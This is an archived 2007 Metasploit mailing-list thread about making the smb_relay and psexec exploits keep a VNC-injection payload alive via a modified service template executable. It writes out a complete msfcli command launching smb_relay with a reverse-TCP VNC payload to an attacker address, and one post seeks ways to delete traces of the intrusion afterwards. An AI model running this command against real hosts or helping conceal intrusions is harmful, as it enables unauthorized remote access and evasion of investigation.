Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: smb_relay and vncinject

From: sigtrap at sigtrap.org (sigtrap)
Date: Wed, 21 Nov 2007 14:24:50 +0100
Hi,
I now have a new "service template.exe". I managed to steal 10 minutes 
from my friend Magnus Br?ding, in which he threw together a service 
executable template PoC (yes, we're sorry it's bloated :-)) It's 
attached with the password:
"password" (without the quotes)

Got it? ;-)

If you backup the original template.exe and use this instead, the 
exploits psexec and smb_relay will work as intended (other exploits, 
that don't expect a service exe, probably won't work).

Eg:
./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7
PAYLOAD=windows/vncinject/reverse_tcp EXITFUNC=process E

The service is created and starts.
The payload is executed in a new thread.
The service controller *doesn't* kill the process after 30 seconds 
anymore, as it does with the normal template.exe.
When you terminate the vncclient the payload terminates the process 
through the "EXITFUNC=process".
The Windows service MMC snap-in will now report the created service 
as "stopped".

If we could now just make the handler (i.e. the one that that starts the 
VNC client on the attacking computer) report back to the exploit when 
the payload on the victim computer has ended (and thus its process has 
also terminated in this case), it would be easy to remove the service 
and executable on the victim computer, thereby leaving no bigger trace 
behind of the intrusion. I don't know how to do this, but it would be 
really great if someone did.

Regards
//Sigtrap


-----Original Message-----
From: H D Moore <hdm at metasploit.com>
To: framework at metasploit.com
Date: Mon, 10 Sep 2007 10:26:01 -0500
Subject: Re: [framework] Re: smb_relay and vncinject


Patrick nailed it. The SCM seems to be unhappy if the service start 
function doesn't return. To resolve this, we need spawn a new thread
from 
within the wrapper exe and return a successful result back. Is anyone 
familiar with writing EXE-based Windows services?

-HD

On Monday 10 September 2007 09:49, Patrick Webster wrote:

It would appear that Windows is killing your VNC service after 30
seconds because the service did not return a successful start signal
back to the OS within this period.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: template.exe.bin.pgp
Type: application/octet-stream
Size: 224107 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071121/5de116d9/attachment.obj>
Previous By Date Next
Previous By Thread Next

Current thread: